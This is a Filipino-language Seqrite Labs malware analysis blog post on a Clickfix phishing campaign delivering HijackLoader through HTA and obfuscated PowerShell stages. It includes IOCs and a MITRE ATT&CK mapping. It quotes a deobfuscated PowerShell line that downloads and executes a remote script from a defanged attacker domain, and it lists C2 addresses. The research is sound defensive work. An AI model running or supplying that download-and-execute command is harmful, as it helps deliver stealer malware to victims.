• Mga Produkto at Serbisyo
        • Ulap

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Sa Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • Maliit na negosyo

          • SOHO Total Edition
        • Serbisyo

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersecurity at Data Privacy Kamalayan
  • Solutions
    • BFSI
    • Edukasyon
    • Pamahalaan
    • Healthcare
    • ITeS
    • manufacturing
  • kompanya
    • Tungkol samin Seqrite
    • Pamumuno
    • Mga parangal at Sertipikasyon
    • silid-basahan
  • Kasosyo
    • Partner Program
    • Hanapin ang Kasosyo
    • Maging isang Kasosyo
  • Suporta
  • Mga mapagkukunan
    • blog
    • Puting papel
    • Mga Datasheet
    • Pag-aaral ng Kaso
    • Mga Ulat sa Banta
    • Manual
    • PoV
    • Unawa sa Data Privacy
    • Suriin ang Iyong Iskor sa Panganib
    • Mga Diyalogo ng DPDP
    • Oras ng Pagkapribado
Seqrite Labs Blog
Makipag-ugnay sa Sales Inaatake?
  • Mga Produkto at Serbisyo
        • Ulap

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Sa Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • Maliit na negosyo

          • SOHO Total Edition
        • Serbisyo

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersecurity at Data Privacy Kamalayan
  • Solutions
    • BFSI
    • Edukasyon
    • Pamahalaan
    • Healthcare
    • ITeS
    • manufacturing
  • kompanya
    • Tungkol samin Seqrite
    • Pamumuno
    • Mga parangal at Sertipikasyon
    • silid-basahan
  • Kasosyo
    • Partner Program
    • Hanapin ang Kasosyo
    • Maging isang Kasosyo
  • Suporta
  • Mga mapagkukunan
    • blog
    • Puting papel
    • Mga Datasheet
    • Pag-aaral ng Kaso
    • Mga Ulat sa Banta
    • Manual
    • PoV
    • Unawa sa Data Privacy
    • Suriin ang Iyong Iskor sa Panganib
    • Mga Diyalogo ng DPDP
    • Oras ng Pagkapribado
Home   /  Tekniko  / Deconstructing a Cyber ​​​​Deception: Isang Pagsusuri ng Clickfix HijackLoader Phishing Campaign 
Pag-deconstruct ng Cyber ​​​​Deception: Isang Pagsusuri sa Clickfix HijackLoader Phishing Campaign 
12 Setyembre 2025

Pag-deconstruct ng Cyber ​​​​Deception: Isang Pagsusuri sa Clickfix HijackLoader Phishing Campaign 

Sinulat ni Shrutirupa Banerjiee
Shrutirupa Banerjiee
Tekniko

Talaan ng nilalaman 

  • pagpapakilala 
    • Ang Umuunlad na Banta ng Mga Attack Loader 
    • Layunin ng Blog na Ito 
  • Teknikal na Pamamaraan at Pagsusuri 
    • Initial Access at Social Engineering 
    • Multi-Stage Obfuscation at De-obfuscation 
    • Anti-Analysis Techniques 
    • Ang Huling Payload 
  • Konklusyon 
  • Mga IOC 
  • Mabilis na Paggaling Seqrite proteksyon 
  • MITER ATT&CK Mapping 

 

pagpapakilala 

Sa ebolusyon ng mga banta sa cyber, ang panghuling pagpapatupad ng isang nakakahamak na payload ay hindi na ang tanging pokus ng industriya ng cybersecurity. Ang mga attack loader ay lumitaw bilang isang kritikal na elemento ng mga modernong pag-atake, na nagsisilbing pangunahing vector para sa paunang pag-access at nagbibigay-daan sa lihim na paghahatid ng sopistikadong malware sa loob ng isang organisasyon. Hindi tulad ng mga simpleng payload, ang mga loader ay inengineered na may nakatuong layunin: upang iwasan ang mga panseguridad na depensa, magtatag ng pagtitiyaga, at lumikha ng isang paborableng kapaligiran para sa nakatagong pagpapatupad ng panghuling yugto ng malware. Ginagawa nitong mas makabuluhan at nauugnay na banta ang mga ito na nangangailangan ng nakatutok na pagsusuri. 

Kamakailan lamang ay nakasaksi tayo ng pagdami ng HijackLoader malware. Una itong lumitaw noong ikalawang kalahati ng 2023 at mabilis na nakakuha ng atensyon dahil sa kakayahan nitong maghatid ng mga payload at mga kawili-wiling pamamaraan nito para sa paglo-load at pagpapatupad ng mga ito. Kadalasan itong lumilitaw bilang Malware-as-a-Service , na naobserbahan pangunahin sa mga kampanyang may motibasyon sa pananalapi sa buong mundo.

Ang HijackLoader ay naipakalat sa pamamagitan ng mga pekeng installer, mga website na nilason ng SEO , mga nag-ma-malvertise, at mga pirated na software/movie portal , na nagsisiguro ng malawak at oportunistang base ng mga biktima.

Mula noong Hunyo 2025, naobserbahan namin ang mga umaatake na gumagamit ng Clickfix kung saan pinangunahan nito ang mga hindi pinaghihinalaang biktima na mag-download ng mga nakakahamak na .msi installer na nagresulta naman sa pagpapatupad ng HijackLoader. Napagmasdan ang DeerStealer na dina-download bilang huling executable sa makina ng biktima noon.  

Kamakailan, napagmasdan din na ang TAG-150 ay lumitaw kasama ng CastleLoader/CastleBot, habang ginagamit din ang mga panlabas na serbisyo gaya ng HijackLoader bilang bahagi ng mas malawak nitong Malware-as-a-Service ecosystem. 

Madalas na naghahatid ang HijackLoader ng mga stealer at RAT habang patuloy na pinagbubuti ang kasanayan nito. Kilalang-kilala ito sa mga advanced na pamamaraan ng pag-iwas tulad ng:

  • Iproseso ang doppelgänging gamit ang mga natransaktong seksyon 
  • I-unhook ang mga DLL ng system 
  • Mga direktang syscall sa ilalim ng WOW64 
  • Call-stack spoofing 
  • Mga pagsusuri sa anti-VM 

Mula nang matuklasan ito, ang HijackLoader ay patuloy na umunlad, na nagpapakita ng patuloy at tumataas na banta sa iba't ibang industriya. Samakatuwid, kritikal para sa mga organisasyon na magtatag at mapanatili ang tuluy-tuloy na pagsubaybay para sa mga naturang loader upang mabawasan ang panganib ng mga sopistikado, multi-stage na pag-atake. 

Chain ng Impeksyon 

Chain ng Impeksyon

Pangkalahatang-ideya ng Teknikal 

Ang unang pag-access ay nagsisimula sa isang kampanyang phishing na batay sa CAPTCHA, na aming tinukoy bilang Clickfix (Ang pamamaraang ito ay nakitang ginagamit din ng mga umaatake noong Hunyo 2025).

Fig1: CAPTCHA-Based Phishing Page para sa Social Engineering
Fig2: HTA Dropper File para sa Initial Execution

 Ang HTA file na ito ay nagsisilbing paunang downloader, na humahantong sa pagpapatupad ng isang PowerShell file.   

Fig3: Inisyal na PowerShell Loader Script

Sa pag-decode ng Base64-encoded string sa itaas, nakakuha kami ng isa pang PowerShell script, tulad ng ipinapakita sa ibaba. 

Fig4: First-Stage Obfuscated PowerShell Script

Ang na-decode na PowerShell script sa itaas ay labis na na-obfuscate, na nagpapakita ng malaking hamon sa static na pagsusuri at pagtukoy na nakabatay sa lagda. Sa halip na gumamit ng mga nababasang string at variable, dynamic itong bumubuo ng mga command at value sa pamamagitan ng mga kumplikadong mathematical na operasyon at ang muling pagtatayo ng mga string mula sa mga array ng character. 

Habang nireresolba ang payload sa itaas, nakikita namin na nade-decode ito sa command sa ibaba, na habang hindi pa rin nababasa, ay maaaring ganap na ma-de-obfuscate. 

Fig5: Deobfuscation ng First stage obfuscated payload

Pagkatapos ng buong de-obfuscation, nakita namin na sinusubukan ng script na kumonekta sa isang URL upang mag-download ng kasunod na file.  

iex ((New-Object System.Net.WebClient).DownloadString('https://rs.mezi[.]bet/samie_bower.mp3'))  

Kapag tumakbo sa isang debugger, ang script na ito ay nagbabalik ng isang error, na nagpapahiwatig na hindi ito makakonekta sa URL.  

Fig6: Debugger View ng Nabigong Koneksyon ng C2

Ang file na samie-bower.mp3 ay isa pang PowerShell script, na sa mahigit 18,000 linya ay lubhang natatakpan at kumakatawan sa susunod na yugto ng loader.

Fig7: Mainstage PowerShell Loader (samie_bower.mp3)

Sa pamamagitan ng pag-debug, naobserbahan namin na ang PowerShell file na ito ay nagsasagawa ng maraming pagsusuri sa Anti-VM , kabilang ang pagsisiyasat sa bilang ng mga tumatakbong proseso at paggawa ng mga pagbabago sa mga registry key.

Fig8: Mga Pagsusuri sa Pag-iwas sa Anti-Virtual Machine at Sandbox

Ang mga pagsusuring ito ay tila partikular na nagta-target at nagbabasa ng mga VirtualBox identifier upang matukoy kung ang script ay tumatakbo sa isang virtualized na kapaligiran.

Habang sinusuri ang script, napagmasdan namin na ang panghuling payload ay nasa loob ng huling ilang linya, kung saan ang paunang obfuscated loader ay naghahatid ng panghuling malisyosong utos. 

Fig9: Pangwakas na pagpapatupad

 Ang deklarasyon sa itaas na walang kwentang variable ay nalutas na; sa pagpapatupad, nagsasagawa ito ng Base64 decoding, mga operasyon ng XOR, at karagdagang mga gawain sa pag-decryption, bago mag-load ng isa pang PowerShell script na malamang na nag-inject ng PE file.  

Fig10: Intermediate PowerShell Script para sa PE Injection
Fig11: Base64-Encoded Embedded PE Payload

 

Ang pag-decode sa file na ito ay nagpapakita ng isang naka-embed na PE file, na makikilala sa pamamagitan ng MZ header nito na.

Fig12: Na-decode na PE File na may MZ Header

Ang PE file na ito ay isang .NET executable na puno ng laman.

Fig13: Naka-pack na .NET Executable Payload

Ang executable payload ay naglo-load ng malaking halaga ng code, malamang na kinuha mula sa seksyon ng mga mapagkukunan nito. 

Fig14: In-Memory Unpacking ng .NET Executable

Kapag na-unpack, ang executable payload ay lalabas na naglo-load ng isang DLL file. 

Fig15: Protektadong DLL Loaded In-Memory

Ang DLL file na ito ay pinoprotektahan din, malamang na maiwasan ang reverse engineering at pagsusuri. 

Fig16: Mga Tagapagpahiwatig ng Proteksyon ng DLL

Ang HijackLoader ay may kasaysayan ng paggamit ng isang prosesong may maraming yugto na kinasasangkutan ng isang executable na sinusundan ng isang DLL. Ang huling yugtong ito ng loader ay nagtatangkang kumonekta sa isang C2 server, kung saan dina-download ang isang infostealer malware . Sa kasong ito, tinatangkang kumonekta ng malware ang URL sa ibaba.

Fig17: Panghuling Pagsubok sa Koneksyon ng C2 Server

Bagama't hindi na maa-access ang C2 na ito, ang pagtatangkang kumonekta ay naaayon sa pag-uugali ng NekoStealer Malware . Ang HijackLoader na ito ay nasangkot sa pag-download ng iba't ibang stealer malware kabilang na rin ang Lumma.

Konklusyon 

Ang matagumpay na pagtatanggol laban sa mga sopistikadong loader tulad ng HijackLoader ay nangangailangan ng paglipat ng focus mula sa static, panghuling yugto ng mga payload patungo sa kanilang dynamic at patuloy na nagbabagong mga mekanismo ng paghahatid. Sa pamamagitan ng pagtutuon ng pansin sa pag-detect ng paunang pag-access at mga intermediate na yugto ng obfuscation, ang mga organisasyon ay maaaring bumuo ng mas nababanat na mga depensa laban sa patuloy na banta na ito. Parehong mahalaga na magpatibay ng isang proactive na diskarte sa lahat ng mga layer, sa halip na tumuon lamang sa paunang pag-access o sa huling payload. Ang mga intermediate na layer ay madalas kung saan ipinakilala ng mga umaatake ang pinakamahalagang pagbabago upang mapadali ang matagumpay na pag-deploy ng malware. 

Mga IOC: 

  • 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57 
  • 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4 
  • 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df 
  • 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d 
  • 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184 
  • e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82 
  • 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd 
  • c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e 
  • D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4 
  • 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee 
  • hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta  
  • 91[.]212[.]166[.]51 
  • 37[.]27[.]165[.]65:1477 
  • cosi[.]com[.]ar 
  • hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3 
  • hxxp[:]//77[.]91[.]101[.]66/ 

Mabilis na Paggaling Seqrite Proteksyon: 

  • Script.Trojan.49900.GC 
  • Loader.StealerDropperCiR 
  • Trojan.InfoStealerCiR 
  • Trojan.Agent 
  • BDS/511 

MITRE Att&ck: 

Pantaktika  Technique ID  Pangalan ng Teknik 
Paunang Pag-access  T1566.002  Phishing: Spearphishing Link (CAPTCHA phishing page) 
T1189  Drive-by Compromise (malvertising, SEO poisoning, pekeng installer) 
Pagpapatupad  T1059.001  Command and Scripting Interpreter: PowerShell 
Pag-iwas sa Depensa  T1027  Mga Na-obfuscate na File o Impormasyon (mga multi-stage na na-obfuscate na script) 
T1140  I-deobfuscate/Decode ang mga File o Impormasyon (Base64, XOR decoding) 
T1562.001  Impair Defenses: I-disable o Baguhin ang Tools (unhooking DLLs) 
T1070.004  Pag-alis ng Tagapagpahiwatig: Pagtanggal ng File (malamang na ginagamit sa mga naka-stage na loader) 
T1211  Pagsasamantala para sa Pag-iwas sa Depensa (mga direktang syscall sa ilalim ng WOW64) 
T1036  Pagbabalatkayo (mga pekeng extension tulad ng .mp3 para sa mga PowerShell script) 
Pagkatuklas  T1082  System Information Discovery (VM checks, registry query) 
T1497.001  Virtualization/Sandbox Evasion: Mga Pagsusuri ng System 
Pagtitiyaga  T1547.001  Boot o Logon Autostart Execution: Registry Run Keys (registry tampering) 
Pagtitiyaga / Pribilehiyo Esc.  T1055  Proseso ng Pag-iniksyon (PE injection routines) 
Command at Control (C2)  T1071.001  Application Layer Protocol: Mga Web Protocol (HTTP/HTTPS C2 traffic) 
T1105  Ingress Tool Transfer (pagda-download ng mga karagdagang payload) 
Epekto / Koleksyon  T1056 / T1005  Input Capture / Data mula sa Local System (pag-andar ng info-stealer ng final payload) 

 

Mga May-akda: 

Niraj Lazarus Makasare 

Shrutirupa Banerjiee 

 nakaraang PostEcholeak- Magpadala ng prompt , kunin ang lihim mula sa Copilot AI!( CVE-20...
susunod na Post  Bakit Hindi na Makakaasa ang mga Bangko sa Rehiyon at Kooperatiba sa Legacy V...
Shrutirupa Banerjiee

Tungkol sa Shrutirupa Banerjiee

Ako si Shrutirupa, kasalukuyang nagtatrabaho bilang Senior Security Researcher sa SEQRITE Mga LAB. Dahil sa halos 5 taong karanasan, inilipat ko ang aking pokus mula sa blockchain...

Mga artikulo ni Shrutirupa Banerjiee »

Kaugnay na Post

  • Pag-abuso sa Pinagkakatiwalaang Daloy ng Trabaho sa Negosyo: Isang Kampanya na May Maraming Yugto para sa Phantom Stealer

    Hulyo 22, 2026
  • Sa Likod ng Refund: Mula sa GST Phishing hanggang sa Remcos RAT sa pamamagitan ng isang Multi-Stage .NET Infection Chain

    Hulyo 17, 2026
  • Operation ShadowRecruit: Isang Kampanya ng Malware na May Temang Pangrekrutment na Gumagamit ng ControlR at Google Sheets para Targetin ang mga Naghahanap ng Trabaho sa India

    Hulyo 14, 2026
Mga Tampok na May-akda
  • Seqrite
    Seqrite

    Seqrite ay isang nangungunang tagapagbigay ng mga solusyon sa cybersecurity para sa mga negosyo. Nakatuon...

    Magbasa pa ng mga artikulo ni Seqrite
  • Jyoti Karlekar
    Jyoti Karlekar

    Ako ay isang masugid na manunulat na nasisiyahan sa paggawa ng nilalaman tungkol sa mga umuusbong na teknolohiya at...

    Magbasa pa ng mga artikulo ni Jyoti Karlekar
  • Bineesh P
    Bineesh P

    Ako ay isang masigasig na mahilig sa cybersecurity at isang dedikadong manunulat. May talino...

    Magbasa pa ng mga artikulo ni Bineesh P
  • Sanjay Katkar
    Sanjay Katkar

    Si Sanjay Katkar ay ang Pinagsamang Managing Director ng Quick Heal Technologies...

    Magbasa pa ng mga artikulo ni Sanjay Katkar
Paksa
malamang (25) Pag-atake sa cyber (36) cyber-atake (58) cyberattack (16) cyberattacks (15) Cybersecurity (341) cyber seguridad (34) Banta ng cyber (33) pagbabanta cyber (51) data paglabag (56) mga paglabag sa data (29) pagkawala ng data (28) pag-iwas sa pagkawala ng data (34) data privacy (16) proteksyon ng data (34) data security (19) DLP (50) DPDP (14) DPDPA (17) Encryption (16) endpoint security (113) Seguridad sa enterprise (20) Pagsamantalahan (13) GDPR (14) malware (76) pagsusuri ng malware (14) pag-atake ng malware (23) MDM (27) microsoft (15) MITER ATT&CK (14) Seguridad sa network (26) Phishing (30) ransomware (69) atake ng ransomware (31) atake ng ransomware (31) proteksyon sa ransomware (17) Seqrite (41) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Serbisyo (16) pagbabanta ng pagbabanta (14) Threat Intelligence (21) UTM (34) Kahinaan (16) zero tiwala (13)
Seqrite Labs

Nangunguna sa enterprise IT security solutions provider na pinapasimple ang endpoint, data, at network security na may pinakamahusay na in-class na mga solusyon sa pag-iwas, pagtuklas, at pagtugon sa pagbabanta sa buong mundo.

Magbasa pa tungkol sa Seqrite

Sundan kami:

Mag-subscribe Upang Ang aming Newsletter

Manatiling may alam tungkol sa pinakabagong mga uso at insight sa cybersecurity.

Pagkarga
Mga Produkto at Serbisyo
  • Ulap
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • Sa Prem
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Platform
  • Malware Analysis Platform
  • Micro Business
  • SOHO Total Edition
  • Serbisyo
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Cybersecurity at Data Privacy Kamalayan
Mga mapagkukunan
  • blog
  • Puting papel
  • Mga Datasheet
  • Mga Ulat sa Banta
  • Manual
  • PoV
  • Unawa sa Data Privacy
  • Mga Diyalogo ng DPDP
  • Patakaran at Pagsunod
  • EULA
  • GoDeep.AI
  • SIA
  • Oras ng Pagkapribado
Makipag-ugnayan sa amin
  • Mga Rehistradong Tanggapan
  • Pag-usapan natin ang Cybersecurity
Suporta
  • Teknikal na Suporta
  • I-download ang Software
  • Offline Updater
  • Mga Pag-upgrade sa Firmware
  • Upgrade
  • Documentation ng Produkto
Sa
  • Tungkol samin Seqrite
  • Pamumuno
  • Mga Gantimpala at Pagkilala
  • silid-basahan
Kasosyo
  • Partner Program
  • Hanapin ang Kasosyo
  • Maging isang Kasosyo
  • Seqrite certification

© 2026 Quick Heal Technologies Ltd.

Sitemap Mga Patakaran sa Privacy legal Notices Mga Patakaran sa Cookie Mga Tuntunin ng Paggamit